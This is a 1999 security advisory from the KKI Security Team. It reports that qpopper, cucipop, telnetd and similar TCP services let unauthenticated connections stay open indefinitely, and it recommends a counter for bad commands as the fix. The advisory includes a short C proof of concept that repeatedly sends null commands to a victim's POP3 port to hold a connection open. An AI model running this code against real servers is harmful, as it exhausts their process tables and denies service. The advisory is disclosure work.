Date: Wed, 28 Apr 1999 13:59:28 +0200
From: Lukasz Luzar <[email protected]>
To: [email protected]Subject: KKIS.28041999.002.b
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
### ### ### ### ###
### ### ### ### ###
###### ###### ###
### ### ### ### ###
### ### ### ### ###
S E C U R I T Y
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
KKI Security Team Cracow Commercial Internet
http://www.security.kki.plhttp://www.kki.pl
mailto:[email protected] mailto:[email protected]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Raport title : Flaws in implementations of mechanisms which
prevents from maintaining the parasitize connections
in many tcp network services.
Problem found by : Lukasz Luzar ([email protected])
Raport created by : Robert Pajak ([email protected])
Lukasz Luzar ([email protected])
Raport published : 28 April 1999
Raport code : KKIS.28041999.002.b
Vulnerable programs : qpopper, in.pop3, cucipop, telnetd, ...
Systems affected : Linux, FreeBSD, Solaris, ...
Archive : http://www.security.kki.pl/advisories/
Risk level : low
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The designers of many popular network services are trying to make the
mechanisms which should prevents from maintaining the parasitize connections
to their programs.
The exercise of such protection is timeout, which closes inactive
connections.
But some of those designers forgets that some malicious guys may often
and fraquently send strings full of bad or null commands to the open port
of the service. Such situation might happen before login/password
authentication of the connection.
Those programmers should implement additional mechanisms to prevent such
situations. Good solution is to put counter of bad (or null) commands
inside the program.
For example, the similiar mechanism has been applied in sendmail.
This soluition is effective and very easy to implement.
Lack of this mechanism may be quite threateing, because most of that tcp
services are working with root privilages, and the bounds of amount of root
proceses isn't easy, when the service has no internal bound.
That affects whole system, when proccess table is fulfiled for
example by multiply open connections to the vulnerable tcp service.
Worst situation is, when vulnerable service doesn't logs any information
about connection before authentication with login/password.
One of this most vulnerable services is cucipop.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Impact ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Below example shows how to open and maintain the connection,
which might state open by undefined time.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--- CUT HERE ---
/*
* example.c by Lukasz Luzar ([email protected])
*/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
/* victim's address and port of service */
#define ADDR "10.0.0.1" //IP in dot natation
#define PORT 110 //e.g. some pop3
#define DELAY 4 //(4 secs.) how often we are sending bad commands
#define COMMAND "\n" //some bad (or null) command
void main()
{
int sockfd,
j,k;
struct sockaddr_in victim_addr;
bzero((char *) &victim_addr, sizeof( victim_addr));
victim_addr.sin_family = AF_INET;
victim_addr.sin_addr.s_addr = inet_addr( ADDR);
victim_addr.sin_port = htons( PORT);
if(( sockfd = socket( AF_INET, SOCK_STREAM, 0)) < 0)
fprintf( stderr, "socket error\n");
if( connect( sockfd,(struct sockaddr*) &victim_addr,
sizeof( victim_addr)) < 0)
fprintf( stderr,"connect error\n");
k = 1;
if( setsockopt( sockfd,IPPROTO_TCP,TCP_NODELAY,&k,sizeof( k)) != 0)
fprintf( stderr,"setsockopt error\n");
j = strlen( COMMAND);
for(;;) {
if( write( sockfd,COMMAND,j) == -1)
fprintf( stderr,"write error\n");
fprintf( stderr,".");
sleep( DELAY);
}
}
--- CUT HERE ---
~~~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright (c) 1999 KKI Security Team, Poland
All rights reserved.
All questions please address to mailto:[email protected]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
